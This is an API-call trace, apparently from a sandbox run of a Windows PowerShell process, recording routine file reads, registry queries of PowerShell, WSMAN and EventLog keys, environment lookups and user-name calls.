	[0827.217] ReadFile (in: hFile=0x308, lpBuffer=0x2f57360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x2f57360*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0827.218] ReadFile (in: hFile=0x308, lpBuffer=0x2f57360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x2f57360*, lpNumberOfBytesRead=0x1cd358*=0xe98, lpOverlapped=0x0) returned 1
	[0827.218] ReadFile (in: hFile=0x308, lpBuffer=0x2f56960, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x2f56960*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0827.219] ReadFile (in: hFile=0x308, lpBuffer=0x2f57360, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x2f57360*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0827.219] CloseHandle (hObject=0x308) returned 1
	[0827.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0827.219] SetErrorMode (uMode=0x1) returned 0x1
	[0827.219] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd300 | out: lpFileInformation=0x1cd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0827.219] SetErrorMode (uMode=0x1) returned 0x1
	[0827.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0827.220] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x308) returned 0x0
	[0827.220] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd36c, lpData=0x0, lpcbData=0x1cd368*=0x0 | out: lpType=0x1cd36c*=0x1, lpData=0x0, lpcbData=0x1cd368*=0x56) returned 0x0
	[0827.220] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ef640
	[0827.220] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd33c, lpData=0x1b8ef640, lpcbData=0x1cd338*=0x56 | out: lpType=0x1cd33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd338*=0x56) returned 0x0
	[0827.220] CoTaskMemFree (pv=0x1b8ef640) 
	[0827.220] RegCloseKey (hKey=0x308) returned 0x0
	[0827.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0827.220] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0827.221] VirtualQuery (in: lpAddress=0x1cbe80, lpBuffer=0x1ccd40, dwLength=0x30 | out: lpBuffer=0x1ccd40*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0827.222] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x890bcb24, Data2=0x54bc, Data3=0x42e1, Data4=([0]=0x92, [1]=0xaf, [2]=0xac, [3]=0xd0, [4]=0x98, [5]=0x81, [6]=0xc3, [7]=0x75))) returned 0x0
	[0827.223] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x3cc501ce, Data2=0x438b, Data3=0x41a7, Data4=([0]=0x87, [1]=0xa8, [2]=0xaa, [3]=0xf3, [4]=0x36, [5]=0x60, [6]=0x1, [7]=0xcd))) returned 0x0
	[0829.983] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0829.983] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0829.983] CoTaskMemFree (pv=0x2d4e20) 
	[0829.985] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0829.985] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0829.985] CoTaskMemFree (pv=0x2d4e20) 
	[0829.986] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0829.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0829.986] CoTaskMemFree (pv=0x2d4e20) 
	[0829.988] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0829.988] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0829.988] CoTaskMemFree (pv=0x2d4e20) 
	[0829.995] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0829.995] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0829.995] CoTaskMemFree (pv=0x2d4e20) 
	[0830.000] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0830.000] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0830.000] CoTaskMemFree (pv=0x2d4e20) 
	[0830.001] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0830.001] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0830.001] CoTaskMemFree (pv=0x2d4e20) 
	[0830.005] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5f8 | out: phkResult=0x1cd5f8*=0x308) returned 0x0
	[0830.006] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd4fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd4f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd4fc*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd4f8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0830.006] CoTaskMemFree (pv=0x0) 
	[0830.006] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0830.006] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0x269740, lpcchValueName=0x1cd5a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd5a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0830.006] CoTaskMemFree (pv=0x269740) 
	[0830.006] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0830.006] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0x269740, lpcchValueName=0x1cd5a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd5a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0830.007] CoTaskMemFree (pv=0x269740) 
	[0830.007] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0830.007] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0x269740, lpcchValueName=0x1cd5a8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd5a8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0830.007] CoTaskMemFree (pv=0x269740) 
	[0830.007] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd58c, lpData=0x0, lpcbData=0x1cd588*=0x0 | out: lpType=0x1cd58c*=0x1, lpData=0x0, lpcbData=0x1cd588*=0x8) returned 0x0
	[0830.007] CoTaskMemAlloc (cb=0xc) returned 0x2c1250
	[0830.007] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd55c, lpData=0x2c1250, lpcbData=0x1cd558*=0x8 | out: lpType=0x1cd55c*=0x1, lpData="2.0", lpcbData=0x1cd558*=0x8) returned 0x0
	[0830.007] CoTaskMemFree (pv=0x2c1250) 
	[0843.721] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd548 | out: phkResult=0x1cd548*=0x318) returned 0x0
	[0843.721] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd44c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd448, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd44c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd448*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0843.721] CoTaskMemFree (pv=0x0) 
	[0843.721] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0843.721] RegEnumValueW (in: hKey=0x318, dwIndex=0x0, lpValueName=0x269740, lpcchValueName=0x1cd4f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x1cd4f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0843.721] CoTaskMemFree (pv=0x269740) 
	[0843.721] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0843.721] RegEnumValueW (in: hKey=0x318, dwIndex=0x1, lpValueName=0x269740, lpcchValueName=0x1cd4f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x1cd4f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0843.721] CoTaskMemFree (pv=0x269740) 
	[0843.721] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0843.721] RegEnumValueW (in: hKey=0x318, dwIndex=0x2, lpValueName=0x269740, lpcchValueName=0x1cd4f8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x1cd4f8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0843.721] CoTaskMemFree (pv=0x269740) 
	[0843.721] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd4dc, lpData=0x0, lpcbData=0x1cd4d8*=0x0 | out: lpType=0x1cd4dc*=0x1, lpData=0x0, lpcbData=0x1cd4d8*=0x8) returned 0x0
	[0843.721] CoTaskMemAlloc (cb=0xc) returned 0x2c1810
	[0843.721] RegQueryValueExW (in: hKey=0x318, lpValueName="StackVersion", lpReserved=0x0, lpType=0x1cd4ac, lpData=0x2c1810, lpcbData=0x1cd4a8*=0x8 | out: lpType=0x1cd4ac*=0x1, lpData="2.0", lpcbData=0x1cd4a8*=0x8) returned 0x0
	[0843.721] CoTaskMemFree (pv=0x2c1810) 
	[0843.723] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0843.723] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0843.723] CoTaskMemFree (pv=0x2d4e20) 
	[0843.728] CoTaskMemAlloc (cb=0x104) returned 0x2d4e20
	[0843.728] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d4e20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0843.728] CoTaskMemFree (pv=0x2d4e20) 
	[0844.739] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd578 | out: phkResult=0x1cd578*=0x320) returned 0x0
	[0844.744] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd4ec, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd4e8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd4ec*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd4e8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0844.744] CoTaskMemFree (pv=0x0) 
	[0844.745] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0844.745] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x0, lpName=0x269740, lpcchName=0x1cd578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0844.745] CoTaskMemFree (pv=0x269740) 
	[0844.745] CoTaskMemFree (pv=0x0) 
	[0844.745] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0844.745] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x1, lpName=0x269740, lpcchName=0x1cd578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0844.745] CoTaskMemFree (pv=0x269740) 
	[0844.745] CoTaskMemFree (pv=0x0) 
	[0844.745] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0844.745] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x2, lpName=0x269740, lpcchName=0x1cd578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0844.745] CoTaskMemFree (pv=0x269740) 
	[0844.745] CoTaskMemFree (pv=0x0) 
	[0844.745] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0844.745] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x3, lpName=0x269740, lpcchName=0x1cd578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0844.745] CoTaskMemFree (pv=0x269740) 
	[0844.745] CoTaskMemFree (pv=0x0) 
	[0844.746] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0844.746] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x4, lpName=0x269740, lpcchName=0x1cd578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0844.746] CoTaskMemFree (pv=0x269740) 
	[0844.746] CoTaskMemFree (pv=0x0) 
	[0844.746] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0844.746] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x5, lpName=0x269740, lpcchName=0x1cd578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0844.746] CoTaskMemFree (pv=0x269740) 
	[0844.746] CoTaskMemFree (pv=0x0) 
	[0844.746] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0844.746] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x6, lpName=0x269740, lpcchName=0x1cd578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0844.746] CoTaskMemFree (pv=0x269740) 
	[0844.746] CoTaskMemFree (pv=0x0) 
	[0844.746] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0844.746] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x7, lpName=0x269740, lpcchName=0x1cd578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0844.746] CoTaskMemFree (pv=0x269740) 
	[0844.746] CoTaskMemFree (pv=0x0) 
	[0844.746] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0844.746] RegEnumKeyExW (in: hKey=0x320, dwIndex=0x8, lpName=0x269740, lpcchName=0x1cd578, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0x1cd578, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0844.747] CoTaskMemFree (pv=0x269740) 
	[0844.747] CoTaskMemFree (pv=0x0) 
	[0844.747] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x328) returned 0x0
	[0844.747] RegOpenKeyExW (in: hKey=0x328, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x0) returned 0x2
	[0844.747] RegOpenKeyExW (in: hKey=0x320, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x32c) returned 0x0
	[0844.747] RegOpenKeyExW (in: hKey=0x32c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x0) returned 0x2
	[0844.747] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x330) returned 0x0
	[0844.747] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x0) returned 0x2
	[0844.747] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x334) returned 0x0
	[0844.748] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x0) returned 0x2
	[0844.748] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x338) returned 0x0
	[0844.748] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x0) returned 0x2
	[0844.748] RegOpenKeyExW (in: hKey=0x320, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x33c) returned 0x0
	[0844.748] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x0) returned 0x2
	[0844.748] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x340) returned 0x0
	[0844.748] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x0) returned 0x2
	[0844.748] RegOpenKeyExW (in: hKey=0x320, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x344) returned 0x0
	[0844.748] RegOpenKeyExW (in: hKey=0x344, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x0) returned 0x2
	[0844.749] RegOpenKeyExW (in: hKey=0x320, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x348) returned 0x0
	[0844.749] RegOpenKeyExW (in: hKey=0x348, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd5d8 | out: phkResult=0x1cd5d8*=0x34c) returned 0x0
	[0844.749] RegCloseKey (hKey=0x34c) returned 0x0
	[0844.749] RegCloseKey (hKey=0x320) returned 0x0
	[0844.750] RegCloseKey (hKey=0x348) returned 0x0
	[0844.761] CoTaskMemAlloc (cb=0x804) returned 0x1b904a40
	[0844.766] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b904a40, nSize=0x1cd7e8 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0x1cd7e8) returned 0x1
	[0844.767] CoTaskMemFree (pv=0x1b904a40) 
	[0844.768] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0844.768] GetUserNameW (in: lpBuffer=0x269740, pcbBuffer=0x1cd828 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1cd828) returned 1
	[0844.769] CoTaskMemFree (pv=0x269740) 
	[0847.181] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd528 | out: phkResult=0x1cd528*=0x350) returned 0x0
	[0847.181] RegQueryInfoKeyW (in: hKey=0x350, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1cd49c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd498, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1cd49c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1cd498*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.182] CoTaskMemFree (pv=0x0) 
	[0847.182] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.182] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x0, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.182] CoTaskMemFree (pv=0x269740) 
	[0847.182] CoTaskMemFree (pv=0x0) 
	[0847.182] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.182] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x1, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.182] CoTaskMemFree (pv=0x269740) 
	[0847.182] CoTaskMemFree (pv=0x0) 
	[0847.182] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.182] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x2, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.182] CoTaskMemFree (pv=0x269740) 
	[0847.182] CoTaskMemFree (pv=0x0) 
	[0847.182] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.182] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x3, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.183] CoTaskMemFree (pv=0x269740) 
	[0847.183] CoTaskMemFree (pv=0x0) 
	[0847.183] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.183] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x4, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.183] CoTaskMemFree (pv=0x269740) 
	[0847.183] CoTaskMemFree (pv=0x0) 
	[0847.183] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.183] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x5, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.183] CoTaskMemFree (pv=0x269740) 
	[0847.183] CoTaskMemFree (pv=0x0) 
	[0847.183] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.183] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x6, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.183] CoTaskMemFree (pv=0x269740) 
	[0847.183] CoTaskMemFree (pv=0x0) 
	[0847.183] CoTaskMemAlloc (cb=0x204) returned 0x269740
	[0847.184] RegEnumKeyExW (in: hKey=0x350, dwIndex=0x7, lpName=0x269740, lpcchName=0x1cd528, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1cd528, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0847.184] CoTaskMemFree (pv=0x269740) 
	[0847.184] CoTaskMemFree (pv=0x0) 
	[0847.184] CoTaskMemAlloc (cb=0x204) returned 0x269740
